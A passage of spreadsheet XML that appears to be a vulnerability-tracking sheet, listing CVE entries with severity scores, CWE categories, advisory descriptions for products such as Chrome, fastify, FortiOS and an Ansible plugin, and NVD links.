          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="1910">
      <c r="A1910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="C1910" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1910" s="5" t="inlineStr"/>
      <c r="F1910" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1910" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1910" s="5" t="inlineStr"/>
      <c r="I1910" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1910" s="5" t="inlineStr"/>
      <c r="K1910" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L1910" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.10.0, httpcore2 fails to start TLS in src/httpcore2/httpcore2/_sync/socks_proxy.py and src/httpcore2/httpcore2/_async/socks_proxy.py when the remote origin uses wss through a SOCKS5 proxy because the TLS upgrade condition only recognizes https. HTTPX2 exposes the flaw through Client.websocket() and AsyncClient.websocket() from 2.6.0 through 2.9.1, so the opening handshake, query parameters, Authorization headers, cookies, and subsequent frames can cross the proxy path in plaintext without certificate verification. An attacker controlling or observing that path can read or modify traffic and impersonate the WebSocket server. This issue is fixed in httpcore2 2.10.0 and HTTPX2 2.10.0.</t>
        </is>
      </c>
      <c r="M1910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="1911">
      <c r="A1911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="C1911" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1911" s="5" t="inlineStr"/>
      <c r="F1911" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1911" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1911" s="5" t="inlineStr"/>
      <c r="I1911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1911" s="5" t="inlineStr"/>
      <c r="K1911" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L1911" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M1911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="1912">
      <c r="A1912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84504</t>
        </is>
      </c>
      <c r="C1912" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1912" s="5" t="inlineStr"/>
      <c r="F1912" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1912" s="5" t="inlineStr"/>
      <c r="H1912" s="5" t="inlineStr"/>
      <c r="I1912" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1912" s="5" t="inlineStr"/>
      <c r="K1912" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1912" s="5" t="inlineStr">
        <is>
          <t>fastify versions before 5.12.2 treat the object resolved by a successful Ajv async validator as the value result protocol used by custom validator compilers. If a request that passes its route schema contains a property named value at the root, fastify replaces the entire request body with that property's value before the handler runs, so the handler receives a different object than the one that satisfied the schema. An authenticated low-privilege caller can use this to make nested data replace the validated body and trigger an operation the route schema did not authorize, leading to unauthorized state changes and data disclosure. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M1912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84504</t>
        </is>
      </c>
    </row>
    <row r="1913">
      <c r="A1913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86242</t>
        </is>
      </c>
      <c r="C1913" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1913" s="5" t="inlineStr"/>
      <c r="F1913" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1913" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1913" s="5" t="inlineStr"/>
      <c r="I1913" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1913" s="5" t="inlineStr"/>
      <c r="K1913" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="L1913" s="5" t="inlineStr">
        <is>
          <t>Bifrost HTTP transport before 2.0.0 accepts an enabled custom plugin whose path is an HTTP URL through unauthenticated POST /api/plugins when management authentication is disabled (the default, governance.auth_config.is_enabled=false). The shared-object loader treats an http-prefixed path as a download URL, writes the body to a temporary .so, and passes it to Go's plugin.Open. After a successful open, optional Init runs immediately with the supplied config as the Bifrost process user. On documented dynamically linked builds (DYNAMIC=1 / no static-link flags), which the vendor requires for custom Go plugins, plugin.Open is expected to succeed and this is unauthenticated remote code execution. On the published statically linked Docker image, plugin.Open fails with Dynamic loading not supported, so that build class is only server-side request forgery. Attack complexity is High because the attacker cannot force RCE on the default static image and a loadable plugin must match the host Go version, OS, architecture, and linkage. The 1.6.x HTTP transport line through 1.6.11 does not contain the fix.</t>
        </is>
      </c>
      <c r="M1913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86242</t>
        </is>
      </c>
    </row>
    <row r="1914">
      <c r="A1914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86479</t>
        </is>
      </c>
      <c r="C1914" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1914" s="5" t="inlineStr"/>
      <c r="F1914" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1914" s="5" t="inlineStr"/>
      <c r="H1914" s="5" t="inlineStr"/>
      <c r="I1914" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1914" s="5" t="inlineStr"/>
      <c r="K1914" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1914" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18788, 
2026.1.14055, 
2025.3.161254 missing authorisation allowed access to restricted REST API resources via IDOR</t>
        </is>
      </c>
      <c r="M1914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86479</t>
        </is>
      </c>
    </row>
    <row r="1915">
      <c r="A1915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87016</t>
        </is>
      </c>
      <c r="C1915" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1915" s="5" t="inlineStr"/>
      <c r="F1915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1915" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1915" s="5" t="inlineStr"/>
      <c r="I1915" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1915" s="5" t="inlineStr"/>
      <c r="K1915" s="5" t="inlineStr">
        <is>
          <t>CWE-155, CWE-287</t>
        </is>
      </c>
      <c r="L1915"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M1915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87016</t>
        </is>
      </c>
    </row>
    <row r="1916">
      <c r="A1916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87036</t>
        </is>
      </c>
      <c r="C1916" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1916" s="5" t="inlineStr"/>
      <c r="F1916" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1916" s="5" t="inlineStr"/>
      <c r="H1916" s="5" t="inlineStr"/>
      <c r="I1916" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1916" s="5" t="inlineStr"/>
      <c r="K1916" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1916" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87036</t>
        </is>
      </c>
    </row>
    <row r="1917">
      <c r="A1917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87075</t>
        </is>
      </c>
      <c r="C1917" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1917" s="5" t="inlineStr"/>
      <c r="F1917" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1917" s="5" t="inlineStr"/>
      <c r="H1917" s="5" t="inlineStr"/>
      <c r="I1917" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1917" s="5" t="inlineStr"/>
      <c r="K1917" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1917" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87075</t>
        </is>
      </c>
    </row>
    <row r="1918">
      <c r="A1918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87457</t>
        </is>
      </c>
      <c r="C1918" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1918" s="5" t="inlineStr"/>
      <c r="F1918" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1918" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1918" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1918" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1918" s="5" t="inlineStr"/>
      <c r="K1918" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1918" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87457</t>
        </is>
      </c>
    </row>
    <row r="1919">
      <c r="A1919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87467</t>
        </is>
      </c>
      <c r="C1919" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1919" s="5" t="inlineStr"/>
      <c r="F1919" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1919" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1919" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1919" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1919" s="5" t="inlineStr"/>
      <c r="K1919" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1919" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87467</t>
        </is>
      </c>
    </row>
    <row r="1920">
      <c r="A1920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87471</t>
        </is>
      </c>
      <c r="C1920" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1920" s="5" t="inlineStr"/>
      <c r="F1920" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1920" s="5" t="inlineStr"/>
      <c r="H1920" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1920" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1920" s="5" t="inlineStr"/>
      <c r="K1920" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1920" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87471</t>
        </is>
      </c>
    </row>
    <row r="1921">
      <c r="A1921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87499</t>
        </is>
      </c>
      <c r="C1921" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1921" s="5" t="inlineStr"/>
      <c r="F1921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1921" s="5" t="inlineStr"/>
      <c r="H1921" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1921" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1921" s="5" t="inlineStr"/>
      <c r="K1921" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1921" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87499</t>
        </is>
      </c>
    </row>
    <row r="1922">
      <c r="A1922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87505</t>
        </is>
      </c>
      <c r="C1922" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1922" s="5" t="inlineStr"/>
      <c r="F1922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1922" s="5" t="inlineStr"/>
      <c r="H1922" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1922" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1922" s="5" t="inlineStr"/>
      <c r="K1922" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1922" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted PDF file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87505</t>
        </is>
      </c>
    </row>
    <row r="1923">
      <c r="A1923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87509</t>
        </is>
      </c>
      <c r="C1923" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1923" s="5" t="inlineStr"/>
      <c r="F1923" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1923" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1923" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1923" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1923" s="5" t="inlineStr"/>
      <c r="K1923" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1923" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87509</t>
        </is>
      </c>
    </row>
    <row r="1924">
      <c r="A1924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87514</t>
        </is>
      </c>
      <c r="C1924" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1924" s="5" t="inlineStr"/>
      <c r="F1924" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1924" s="5" t="inlineStr"/>
      <c r="H1924" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1924" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1924" s="5" t="inlineStr"/>
      <c r="K1924" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1924" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87514</t>
        </is>
      </c>
    </row>
    <row r="1925">
      <c r="A1925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87530</t>
        </is>
      </c>
      <c r="C1925" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1925" s="5" t="inlineStr"/>
      <c r="F1925" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1925" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1925" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1925" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1925" s="5" t="inlineStr"/>
      <c r="K1925" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1925" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87530</t>
        </is>
      </c>
    </row>
    <row r="1926">
      <c r="A1926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87533</t>
        </is>
      </c>
      <c r="C1926" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1926" s="5" t="inlineStr"/>
      <c r="F1926" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1926" s="5" t="inlineStr"/>
      <c r="H1926" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1926" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1926" s="5" t="inlineStr"/>
      <c r="K1926" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1926" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87533</t>
        </is>
      </c>
    </row>
    <row r="1927">
      <c r="A1927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87537</t>
        </is>
      </c>
      <c r="C1927" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1927" s="5" t="inlineStr"/>
      <c r="F1927" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1927" s="5" t="inlineStr"/>
      <c r="H1927" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1927" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1927" s="5" t="inlineStr"/>
      <c r="K1927" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1927" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87537</t>
        </is>
      </c>
    </row>
    <row r="1928">
      <c r="A1928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87554</t>
        </is>
      </c>
      <c r="C1928" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1928" s="5" t="inlineStr"/>
      <c r="F1928" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1928" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1928" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1928" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1928" s="5" t="inlineStr"/>
      <c r="K1928" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1928" s="5" t="inlineStr">
        <is>
          <t>Race condition in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87554</t>
        </is>
      </c>
    </row>
    <row r="1929">
      <c r="A1929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87606</t>
        </is>
      </c>
      <c r="C1929" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1929" s="5" t="inlineStr"/>
      <c r="F1929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1929" s="5" t="inlineStr"/>
      <c r="H1929" s="5" t="inlineStr"/>
      <c r="I1929" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1929" s="5" t="inlineStr"/>
      <c r="K1929" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1929" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87606</t>
        </is>
      </c>
    </row>
    <row r="1930">
      <c r="A1930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87874</t>
        </is>
      </c>
      <c r="C1930" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1930" s="5" t="inlineStr"/>
      <c r="F1930" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1930" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1930" s="5" t="inlineStr"/>
      <c r="I1930" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1930" s="5" t="inlineStr"/>
      <c r="K1930" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1930" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the memcached cache plugin of the community.general Ansible
collection. Although its documentation states that records are stored in JSON
format, the plugin performs no explicit serialization and relies on
python-memcached, which pickles values on write and unpickles them on read.
Because memcached is unauthenticated and cache keys are predictable, an attacker
able to reach a network-exposed or shared memcached instance can write a crafted
pickle payload that is deserialized and executed on the Ansible controller when
the poisoned fact cache is next read, leading to remote code execution.</t>
        </is>
      </c>
      <c r="M1930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87874</t>
        </is>
      </c>
    </row>
    <row r="1931">
      <c r="A1931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87958</t>
        </is>
      </c>
      <c r="C1931" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1931" s="5" t="inlineStr"/>
      <c r="F1931" s="5" t="inlineStr"/>
      <c r="G1931" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H1931" s="5" t="inlineStr"/>
      <c r="I1931" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1931" s="5" t="inlineStr"/>
      <c r="K1931" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1931" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 is vulnerable to a denial of service where a specific functionality on a Db2 server can be disabled by a privileged user under certain conditions.</t>
        </is>
      </c>
